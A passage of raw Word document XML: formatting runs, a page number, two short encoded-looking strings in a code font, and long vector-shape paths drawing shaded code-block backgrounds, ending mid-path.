          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAF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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MG"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1293" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AJ"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group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:16840" coordorigin="10472,0" coordsize="0,16840" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,2,10472,3,10472,5,10472,7,10472,9,10472,13,10472,17,10472,21,10472,27,10472,33,10472,40,10472,49,10472,58,10472,68,10472,79,10472,92,10472,106,10472,121,10472,138,10472,156,10472,175,10472,196,10472,219,10472,243,10472,269,10472,297,10472,327,10472,359,10472,392,10472,428,10472,466,10472,506,10472,548,10472,592,10472,639,10472,688,10472,740,10472,794,10472,851,10472,910,10472,972,10472,1037,10472,1105,10472,1175,10472,1249,10472,1325,10472,1405,10472,1487,10472,1573,10472,1662,10472,1754,10472,1850,10472,1949,10472,2052,10472,2158,10472,2268,10472,2381,10472,2498,10472,2619,10472,2744,10472,2872,10472,3005,10472,3142,10472,3282,10472,3427,10472,3576,10472,3729,10472,3887,10472,4049,10472,4215,10472,4386,10472,4562,10472,4742,10472,4927,10472,5116,10472,5310,10472,5509,10472,5713,10472,5922,10472,6137,10472,6356,10472,6580,10472,6810,10472,7044,10472,7284,10472,7530,10472,7781,10472,8038,10472,8300,10472,8567,10472,8841,10472,9120,10472,9405,10472,9696,10472,9993,10472,10295,10472,10604,10472,10919,10472,11240,10472,11568,10472,11901,10472,12242,10472,12588,10472,12941,10472,13300,10472,13666,10472,14039,10472,14419,10472,14805,10472,15198,10472,15598,10472,16005,10472,16419,10472,16840e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:990;width:9110;height:550" coordorigin="1430,990" coordsize="9110,550" path="m1440,1000l1440,1000,1440,1000,1440,1000,1441,1000,1441,1000,1441,1000,1442,1000,1442,1000,1443,1000,1444,1000,1446,1000,1448,1000,1450,1000,1452,1000,1455,1000,1459,1000,1463,1000,1467,1000,1472,1000,1477,1000,1484,1000,1490,1000,1498,1000,1506,1000,1515,1000,1525,1000,1535,1000,1547,1000,1559,1000,1572,1000,1586,1000,1601,1000,1617,1000,1635,1000,1653,1000,1672,1000,1692,1000,1714,1000,1737,1000,1761,1000,1786,1000,1813,1000,1841,1000,1870,1000,1901,1000,1933,1000,1966,1000,2001,1000,2038,1000,2076,1000,2116,1000,2157,1000,2200,1000,2245,1000,2291,1000,2339,1000,2389,1000,2441,1000,2494,1000,2550,1000,2607,1000,2667,1000,2728,1000,2791,1000,2856,1000,2924,1000,2993,1000,3065,1000,3139,1000,3215,1000,3293,1000,3374,1000,3457,1000,3542,1000,3629,1000,3719,1000,3812,1000,3907,1000,4004,1000,4104,1000,4206,1000,4311,1000,4419,1000,4529,1000,4642,1000,4758,1000,4876,1000,4998,1000,5122,1000,5249,1000,5378,1000,5511,1000,5647,1000,5785,1000,5927,1000,6072,1000,6220,1000,6371,1000,6525,1000,6682,1000,6842,1000,7006,1000,7173,1000,7343,1000,7517,1000,7694,1000,7874,1000,8058,1000,8245,1000,8436,1000,8630,1000,8828,1000,9030,1000,9235,1000,9444,1000,9656,1000,9872,1000,10092,1000,10316,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1013,10543,1014,10543,1015,10543,1016,10543,1018,10543,1019,10543,1021,10543,1022,10543,1024,10543,1026,10543,1028,10543,1030,10543,1032,10543,1034,10543,1036,10543,1038,10543,1041,10543,1043,10543,1046,10543,1049,10543,1052,10543,1055,10543,1058,10543,1061,10543,1064,10543,1067,10543,1071,10543,1075,10543,1078,10543,1082,10543,1086,10543,1090,10543,1095,10543,1099,10543,1104,10543,1108,10543,1113,10543,1118,10543,1123,10543,1128,10543,1134,10543,1139,10543,1145,10543,1151,10543,1157,10543,1163,10543,1169,10543,1175,10543,1182,10543,1189,10543,1196,10543,1203,10543,1210,10543,1217,10543,1225,10543,1233,10543,1241,10543,1249,10543,1257,10543,1266,10543,1274,10543,1283,10543,1292,10543,1301,10543,1311,10543,1321,10543,1330,10543,1340,10543,1351,10543,1361,10543,1372,10543,1383,10543,1394,10543,1405,10543,1416,10543,1428,10543,1440,10543,1452,10543,1464,10543,1477,10543,1490,10543,1503,10543,1516,10543,1529,10543,1543,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10542,1557,10542,1557,10541,1557,10540,1557,10538,1557,10536,1557,10534,1557,10532,1557,10529,1557,10525,1557,10521,1557,10517,1557,10512,1557,10506,1557,10500,1557,10493,1557,10486,1557,10478,1557,10469,1557,10459,1557,10449,1557,10437,1557,10425,1557,10412,1557,10398,1557,10383,1557,10366,1557,10349,1557,10331,1557,10312,1557,10291,1557,10270,1557,10247,1557,10223,1557,10198,1557,10171,1557,10143,1557,10114,1557,10083,1557,10051,1557,10018,1557,9983,1557,9946,1557,9908,1557,9868,1557,9827,1557,9784,1557,9739,1557,9693,1557,9645,1557,9595,1557,9543,1557,9489,1557,9434,1557,9377,1557,9317,1557,9256,1557,9193,1557,9127,1557,9060,1557,8990,1557,8919,1557,8845,1557,8769,1557,8691,1557,8610,1557,8527,1557,8442,1557,8354,1557,8265,1557,8172,1557,8077,1557,7980,1557,7880,1557,7778,1557,7673,1557,7565,1557,7455,1557,7342,1557,7226,1557,7108,1557,6986,1557,6862,1557,6735,1557,6605,1557,6473,1557,6337,1557,6198,1557,6057,1557,5912,1557,5764,1557,5613,1557,5459,1557,5302,1557,5142,1557,4978,1557,4811,1557,4641,1557,4467,1557,4290,1557,4110,1557,3926,1557,3739,1557,3548,1557,3354,1557,3156,1557,2954,1557,2749,1557,2540,1557,2328,1557,2112,1557,1892,1557,1668,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1556,1440,1556,1440,1556,1440,1556,1440,1555,1440,1555,1440,1555,1440,1554,1440,1554,1440,1554,1440,1553,1440,1553,1440,1552,1440,1551,1440,1551,1440,1550,1440,1549,1440,1548,1440,1547,1440,1546,1440,1545,1440,1544,1440,1543,1440,1542,1440,1540,1440,1539,1440,1537,1440,1536,1440,1534,1440,1533,1440,1531,1440,1529,1440,1527,1440,1525,1440,1523,1440,1521,1440,1518,1440,1516,1440,1513,1440,1511,1440,1508,1440,1505,1440,1502,1440,1499,1440,1496,1440,1493,1440,1489,1440,1486,1440,1482,1440,1478,1440,1474,1440,1470,1440,1466,1440,1462,1440,1458,1440,1453,1440,1448,1440,1444,1440,1439,1440,1434,1440,1428,1440,1423,1440,1418,1440,1412,1440,1406,1440,1400,1440,1394,1440,1388,1440,1381,1440,1375,1440,1368,1440,1361,1440,1354,1440,1347,1440,1339,1440,1332,1440,1324,1440,1316,1440,1308,1440,1299,1440,1291,1440,1282,1440,1273,1440,1264,1440,1255,1440,1246,1440,1236,1440,1226,1440,1216,1440,1206,1440,1196,1440,1185,1440,1174,1440,1163,1440,1152,1440,1140,1440,1129,1440,1117,1440,1105,1440,1092,1440,1080,1440,1067,1440,1054,1440,1041,1440,1027,1440,1013,1440,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:990;width:30;height:570" coordorigin="1430,990" coordsize="30,570" path="m1447,1000l1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1001,1447,1001,1447,1001,1447,1001,1447,1002,1447,1002,1447,1003,1447,1003,1447,1004,1447,1004,1447,1005,1447,1005,1447,1006,1447,1007,1447,1008,1447,1008,1447,1009,1447,1010,1447,1011,1447,1013,1447,1014,1447,1015,1447,1016,1447,1018,1447,1019,1447,1021,1447,1022,1447,1024,1447,1026,1447,1028,1447,1030,1447,1032,1447,1034,1447,1036,1447,1038,1447,1041,1447,1043,1447,1046,1447,1049,1447,1052,1447,1055,1447,1058,1447,1061,1447,1064,1447,1067,1447,1071,1447,1075,1447,1078,1447,1082,1447,1086,1447,1090,1447,1095,1447,1099,1447,1104,1447,1108,1447,1113,1447,1118,1447,1123,1447,1128,1447,1134,1447,1139,1447,1145,1447,1151,1447,1157,1447,1163,1447,1169,1447,1175,1447,1182,1447,1189,1447,1196,1447,1203,1447,1210,1447,1217,1447,1225,1447,1233,1447,1241,1447,1249,1447,1257,1447,1266,1447,1274,1447,1283,1447,1292,1447,1301,1447,1311,1447,1321,1447,1330,1447,1340,1447,1351,1447,1361,1447,1372,1447,1383,1447,1394,1447,1405,1447,1416,1447,1428,1447,1440,1447,1452,1447,1464,1447,1477,1447,1490,1447,1503,1447,1516,1447,1529,1447,1543,1447,1557e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:76.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1530" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:1530;width:9110;height:570" coordorigin="1430,1530" coordsize="9110,570" path="m1440,1557l1440,1557,1440,1557,1440,1557,1441,1557,1441,1557,1441,1557,1442,1557,1442,1557,1443,1557,1444,1557,1446,1557,1448,1557,1450,1557,1452,1557,1455,1557,1459,1557,1463,1557,1467,1557,1472,1557,1477,1557,1484,1557,1490,1557,1498,1557,1506,1557,1515,1557,1525,1557,1535,1557,1547,1557,1559,1557,1572,1557,1586,1557,1601,1557,1617,1557,1635,1557,1653,1557,1672,1557,1692,1557,1714,1557,1737,1557,1761,1557,1786,1557,1813,1557,1841,1557,1870,1557,1901,1557,1933,1557,1966,1557,2001,1557,2038,1557,2076,1557,2116,1557,2157,1557,2200,1557,2245,1557,2291,1557,2339,1557,2389,1557,2441,1557,2494,1557,2550,1557,2607,1557,2667,1557,2728,1557,2791,1557,2856,1557,2924,1557,2993,1557,3065,1557,3139,1557,3215,1557,3293,1557,3374,1557,3457,1557,3542,1557,3629,1557,3719,1557,3812,1557,3907,1557,4004,1557,4104,1557,4206,1557,4311,1557,4419,1557,4529,1557,4642,1557,4758,1557,4876,1557,4998,1557,5122,1557,5249,1557,5378,1557,5511,1557,5647,1557,5785,1557,5927,1557,6072,1557,6220,1557,6371,1557,6525,1557,6682,1557,6842,1557,7006,1557,7173,1557,7343,1557,7517,1557,7694,1557,7874,1557,8058,1557,8245,1557,8436,1557,8630,1557,8828,1557,9030,1557,9235,1557,9444,1557,9656,1557,9872,1557,10092,1557,10316,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1559,10543,1559,10543,1559,10543,1560,10543,1560,10543,1561,10543,1561,10543,1562,10543,1562,10543,1563,10543,1563,10543,1564,10543,1565,10543,1566,10543,1567,10543,1568,10543,1569,10543,1570,10543,1571,10543,1572,10543,1573,10543,1575,10543,1576,10543,1578,10543,1579,10543,1581,10543,1583,10543,1585,10543,1587,10543,1589,10543,1591,10543,1593,10543,1595,10543,1597,10543,1600,10543,1603,10543,1605,10543,1608,10543,1611,10543,1614,10543,1617,10543,1620,10543,1623,10543,1627,10543,1630,10543,1634,10543,1638,10543,1642,10543,1646,10543,1650,10543,1654,10543,1659,10543,1663,10543,1668,10543,1673,10543,1678,10543,1683,10543,1688,10543,1693,10543,1699,10543,1705,10543,1710,10543,1716,10543,1723,10543,1729,10543,1735,10543,1742,10543,1749,10543,1756,10543,1763,10543,1770,10543,1777,10543,1785,10543,1793,10543,1801,10543,1809,10543,1817,10543,1826,10543,1834,10543,1843,10543,1852,10543,1861,10543,1871,10543,1880,10543,1890,10543,1900,10543,1910,10543,1921,10543,1931,10543,1942,10543,1953,10543,1964,10543,1976,10543,1987,10543,1999,10543,2011,10543,2023,10543,2036,10543,2049,10543,2062,10543,2075,10543,2088,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10542,2102,10542,2102,10541,2102,10540,2102,10538,2102,10536,2102,10534,2102,10532,2102,10529,2102,10525,2102,10521,2102,10517,2102,10512,2102,10506,2102,10500,2102,10493,2102,10486,2102,10478,2102,10469,2102,10459,2102,10449,2102,10437,2102,10425,2102,10412,2102,10398,2102,10383,2102,10366,2102,10349,2102,10331,2102,10312,2102,10291,2102,10270,2102,10247,2102,10223,2102,10198,2102,10171,2102,10143,2102,10114,2102,10083,2102,10051,2102,10018,2102,9983,2102,9946,2102,9908,2102,9868,2102,9827,2102,9784,2102,9739,2102,9693,2102,9645,2102,9595,2102,9543,2102,9489,2102,9434,2102,9377,2102,9317,2102,9256,2102,9193,2102,9127,2102,9060,2102,8990,2102,8919,2102,8845,2102,8769,2102,8691,2102,8610,2102,8527,2102,8442,2102,8354,2102,8265,2102,8172,2102,8077,2102,7980,2102,7880,2102,7778,2102,7673,2102,7565,2102,7455,2102,7342,2102,7226,2102,7108,2102,6986,2102,6862,2102,6735,2102,6605,2102,6473,2102,6337,2102,6198,2102,6057,2102,5912,2102,5764,2102,5613,2102,5459,2102,5302,2102,5142,2102,4978,2102,4811,2102,4641,2102,4467,2102,4290,2102,4110,2102,3926,2102,3739,2102,3548,2102,3354,2102,3156,2102,2954,2102,2749,2102,2540,2102,2328,2102,2112,2102,1892,2102,1668,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2102,1440,2101,1440,2101,1440,2101,1440,2101,1440,2101,1440,2101,1440,2101,1440,2100,1440,2100,1440,2100,1440,2100,1440,2099,1440,2099,1440,2098,1440,2098,1440,2097,1440,2097,1440,2096,1440,2095,1440,2095,1440,2094,1440,2093,1440,2092,1440,2091,1440,2090,1440,2089,1440,2088,1440,2087,1440,2085,1440,2084,1440,2083,1440,2081,1440,2079,1440,2078,1440,2076,1440,2074,1440,2072,1440,2070,1440,2068,1440,2066,1440,2064,1440,2061,1440,2059,1440,2056,1440,2054,1440,2051,1440,2048,1440,2045,1440,2042,1440,2039,1440,2035,1440,2032,1440,2028,1440,2025,1440,2021,1440,2017,1440,2013,1440,2009,1440,2005,1440,2000,1440,1996,1440,1991,1440,1986,1440,1981,1440,1976,1440,1971,1440,1965,1440,1960,1440,1954,1440,1948,1440,1942,1440,1936,1440,1930,1440,1924,1440,1917,1440,1910,1440,1903,1440,1896,1440,1889,1440,1881,1440,1874,1440,1866,1440,1858,1440,1850,1440,1842,1440,1833,1440,1825,1440,1816,1440,1807,1440,1798,1440,1788,1440,1779,1440,1769,1440,1759,1440,1749,1440,1738,1440,1728,1440,1717,1440,1706,1440,1695,1440,1683,1440,1672,1440,1660,1440,1648,1440,1635,1440,1623,1440,1610,1440,1597,1440,1584,1440,1571,1440,1557e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:77.500pt;width:1.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1550" coordsize="30,550">
        <v:shape style="position:absolute;left:1430;top:1550;width:30;height:550" coordorigin="1430,1550" coordsize="30,550" path="m1447,1557l1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1557,1447,1558,1447,1558,1447,1558,1447,1558,1447,1558,1447,1558,1447,1559,1447,1559,1447,1559,1447,1560,1447,1560,1447,1561,1447,1561,1447,1562,1447,1562,1447,1563,1447,1563,1447,1564,1447,1565,1447,1566,1447,1567,1447,1568,1447,1569,1447,1570,1447,1571,1447,1572,1447,1573,1447,1575,1447,1576,1447,1578,1447,1579,1447,1581,1447,1583,1447,1585,1447,1587,1447,1589,1447,1591,1447,1593,1447,1595,1447,1597,1447,1600,1447,1603,1447,1605,1447,1608,1447,1611,1447,1614,1447,1617,1447,1620,1447,1623,1447,1627,1447,1630,1447,1634,1447,1638,1447,1642,1447,1646,1447,1650,1447,1654,1447,1659,1447,1663,1447,1668,1447,1673,1447,1678,1447,1683,1447,1688,1447,1693,1447,1699,1447,1705,1447,1710,1447,1716,1447,1723,1447,1729,1447,1735,1447,1742,1447,1749,1447,1756,1447,1763,1447,1770,1447,1777,1447,1785,1447,1793,1447,1801,1447,1809,1447,1817,1447,1826,1447,1834,1447,1843,1447,1852,1447,1861,1447,1871,1447,1880,1447,1890,1447,1900,1447,1910,1447,1921,1447,1931,1447,1942,1447,1953,1447,1964,1447,1976,1447,1987,1447,1999,1447,2011,1447,2023,1447,2036,1447,2049,1447,2062,1447,2075,1447,2088,1447,2102e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:104.500pt;width:455.500pt;height:27.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2090" coordsize="9110,550">
        <v:shape style="position:absolute;left:1430;top:2090;width:9110;height:550" coordorigin="1430,2090" coordsize="9110,550" path="m1440,2102l1440,2102,1440,2102,1440,2102,1441,2102,1441,2102,1441,2102,1442,2102,1442,2102,1443,2102,1444,2102,1446,2102,1448,2102,1450,2102,1452,2102,1455,2102,1459,2102,1463,2102,1467,2102,1472,2102,1477,2102,1484,2102,1490,2102,1498,2102,1506,2102,1515,2102,1525,2102,1535,2102,1547,2102,1559,2102,1572,2102,1586,2102,1601,2102,1617,2102,1635,2102,1653,2102,1672,2102,1692,2102,1714,2102,1737,2102,1761,2102,1786,2102,1813,2102,1841,2102,1870,2102,1901,2102,1933,2102,1966,2102,2001,2102,2038,2102,2076,2102,2116,2102,2157,2102,2200,2102,2245,2102,2291,2102,2339,2102,2389,2102,2441,2102,2494,2102,2550,2102,2607,2102,2667,2102,2728,2102,2791,2102,2856,2102,2924,2102,2993,2102,3065,2102,3139,2102,3215,2102,3293,2102,3374,2102,3457,2102,3542,2102,3629,2102,3719,2102,3812,2102,3907,2102,4004,2102,4104,2102,4206,2102,4311,2102,4419,2102,4529,2102,4642,2102,4758,2102,4876,2102,4998,2102,5122,2102,5249,2102,5378,2102,5511,2102,5647,2102,5785,2102,5927,2102,6072,2102,6220,2102,6371,2102,6525,2102,6682,2102,6842,2102,7006,2102,7173,2102,7343,2102,7517,2102,7694,2102,7874,2102,8058,2102,8245,2102,8436,2102,8630,2102,8828,2102,9030,2102,9235,2102,9444,2102,9656,2102,9872,2102,10092,2102,10316,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2102,10543,2103,10543,2103,10543,2103,10543,2103,10543,2104,10543,2104,10543,2104,10543,2105,10543,2105,10543,2106,10543,2106,10543,2107,10543,2108,10543,2108,10543,2109,10543,2110,10543,2111,10543,2112,10543,2113,10543,2114,10543,2115,10543,2116,10543,2117,10543,2118,10543,2120,10543,2121,10543,2123,10543,2125,10543,2126,10543,2128,10543,2130,10543,2132,10543,2134,10543,2136,10543,2138,10543,2141,10543,2143,10543,2146,10543,2148,10543,2151,10543,2154,10543,2157,10543,2160,10543,2163,10543,2166,10543,2170,10543,2173,10543,2177,10543,2181,10543,2184,10543,2188,10543,2193,10543,2197,10543,2201,10543,2206,10543,2210,10543,2215,10543,2220,10543,2225,10543,2230,10543,2236,10543,2241,10543,2247,10543,2253,10543,2259,10543,2265,10543,2271,10543,2278,10543,2284,10543,2291,10543,2298,10543,2305,10543,2312,10543,2320,10543,2327,10543,2335,10543,2343,10543,2351,10543,2359,10543,2368,10543,2377,10543,2385,10543,2394,10543,2404,10543,2413,10543,2423,10543,2433,10543,2443,10543,2453,10543,2463,10543,2474,10543,2485,10543,2496,10543,2507,10543,2519,10543,2530,10543,2542,10543,2554,10543,2567,10543,2579,10543,2592,10543,2605,10543,2618,10543,2632,10543,2645,10543,2659,10543,2659,10543,2659,10543,2659,10543,2659,10543,2659,10543,2659,10542,2659,10542,2659,10541,2659,10540,2659,10538,2659,10536,2659,10534,2659,10532,2659,10529,2659,10525,2659,10521,2659,10517,2659,10512,2659,10506,2659,10500,2659,10493,2659,10486,2659,10478,2659,10469,2659,10459,2659,10449,2659,10437,2659,10425,2659,10412,2659,10398,2659,10383,2659,10366,2659,10349,2659,10331,2659,10312,2659,10291,2659,10270,2659,10247,2659,10223,2659,10198,2659,10171,2659,10143,2659,10114,2659,10083,2659,10051,2659,10018,2659,9983,2659,9946,2659,9908,2659,9868,2659,9827,2659,9784,2659,9739,2659,9693,2659,9645,2659,9595,2659,9543,2659,9489,2659,9434,2659,9377,2659,9317,2659,9256,2659,9193,2659,9127,2659,9060,2659,8990,2659,8919,2659,8845,2659,8769,2659,8691,2659,8610,2659,8527,2659,8442,2659,8354,2659,8265,2659,8172,2659,8077,2659,7980,2659,7880,2659,7778,2659,7673,2659,7565,2659,7455,2659,7342,2659,7226,2659,7108,2659,6986,2659,6862,2659,6735,2659,6605,2659,6473,2659,6337,2659,6198,2659,6057,2659,5912,2659,5764,2659,5613,2659,5459,2659,5302,2659,5142,2659,4978,2659,4811,2659,4641,2659,4467,2659,4290,2659,4110,2659,3926,2659,3739,2659,3548,2659,3354,2659,3156,2659,2954,2659,2749,2659,2540,2659,2328,2659,2112,2659,1892,2659,1668,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2659,1440,2658,1440,2658,1440,2658,1440,2658,1440,2657,1440,2657,1440,2657,1440,2656,1440,2656,1440,2655,1440,2655,1440,2654,1440,2654,1440,2653,1440,2652,1440,2651,1440,2650,1440,2649,1440,2648,1440,2647,1440,2646,1440,2645,1440,2644,1440,2643,1440,2641,1440,2640,1440,2638,1440,2637,1440,2635,1440,2633,1440,2631,1440,2629,1440,2627,1440,2625,1440,2623,1440,2620,1440,2618,1440,2615,1440,2613,1440,2610,1440,2607,1440,2604,1440,2601,1440,2598,1440,2595,1440,2591,1440,2588,1440,2584,1440,2580,1440,2577,1440,2573,1440,2568,1440,2564,1440,2560,1440,2555,1440,2551,1440,2546,1440,2541,1440,2536,1440,2531,1440,2525,1440,2520,1440,2514,1440,2508,1440,2502,1440,2496,1440,2490,1440,2483,1440,2477,1440,2470,1440,2463,1440,2456,1440,2449,1440,2441,1440,2434,1440,2426,1440,2418,1440,2410,1440,2402,1440,2393,1440,2384,1440,2376,1440,2367,1440,2357,1440,2348,1440,2338,1440,2328,1440,2318,1440,2308,1440,2298,1440,2287,1440,2276,1440,2265,1440,2254,1440,2242,1440,2231,1440,2219,1440,2207,1440,2194,1440,2182,1440,2169,1440,2156,1440,2143,1440,2129,1440,2116,1440,2102e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:104.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2090" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:2090;width:30;height:570" coordorigin="1430,2090" coordsize="30,570" path="m1447,2102l1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2102,1447,2103,1447,2103,1447,2103,1447,2103,1447,2104,1447,2104,1447,2104,1447,2105,1447,2105,1447,2106,1447,2106,1447,2107,1447,2108,1447,2108,1447,2109,1447,2110,1447,2111,1447,2112,1447,2113,1447,2114,1447,2115,1447,2116,1447,2117,1447,2118,1447,2120,1447,2121,1447,2123,1447,2125,1447,2126,1447,2128,1447,2130,1447,2132,1447,2134,1447,2136,1447,2138,1447,2141,1447,2143,1447,2146,1447,2148,1447,2151,1447,2154,1447,2157,1447,2160,1447,2163,1447,2166,1447,2170,1447,2173,1447,2177,1447,2181,1447,2184,1447,2188,1447,2193,1447,2197,1447,2201,1447,2206,1447,2210,1447,2215,1447,2220,1447,2225,1447,2230,1447,2236,1447,2241,1447,2247,1447,2253,1447,2259,1447,2265,1447,2271,1447,2278,1447,2284,1447,2291,1447,2298,1447,2305,1447,2312,1447,2320,1447,2327,1447,2335,1447,2343,1447,2351,1447,2359,1447,2368,1447,2377,1447,2385,1447,2394,1447,2404,1447,2413,1447,2423,1447,2433,1447,2443,1447,2453,1447,2463,1447,2474,1447,2485,1447,2496,1447,2507,1447,2519,1447,2530,1447,2542,1447,2554,1447,2567,1447,2579,1447,2592,1447,2605,1447,2618,1447,2632,1447,2645,1447,2659e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:131.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2630" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:2630;width:9110;height:570" coordorigin="1430,2630" coordsize="9110,570" path="m1440,2659l1440,2659,1440,2659,1440,2659,1441,2659,1441,2659,1441,2659,1442,2659,1442,2659,1443,2659,1444,2659,1446,2659,1448,2659,1450,2659,1452,2659,1455,2659,1459,2659,1463,2659,1467,2659,1472,2659,1477,2659,1484,2659,1490,2659,1498,2659,1506,2659,1515,2659,1525,2659,1535,2659,1547,2659,1559,2659,1572,2659,1586,2659,1601,2659,1617,2659,1635,2659,1653,2659,1672,2659,1692,2659,1714,2659,1737,2659,1761,2659,1786,2659,1813,2659,1841,2659,1870,2659,1901,2659,1933,2659,1966,2659,2001,2659,2038,2659,2076,2659,2116,2659,2157,2659,2200,2659,2245,2659,2291,2659,2339,2659,2389,2659,2441,2659,2494,2659,2550,2659,2607,2659,2667,2659,2728,2659,2791,2659,2856,2659,2924,2659,2993,2659,3065,2659,3139,2659,3215,2659,3293,2659,3374,2659,3457,2659,3542,2659,3629,2659,3719,2659,3812,2659,3907,2659,4004,2659,4104,2659,4206,2659,4311,2659,4419,2659,4529,2659,4642,2659,4758,2659,4876,2659,4998,2659,5122,2659,5249,2659,5378,2659,5511,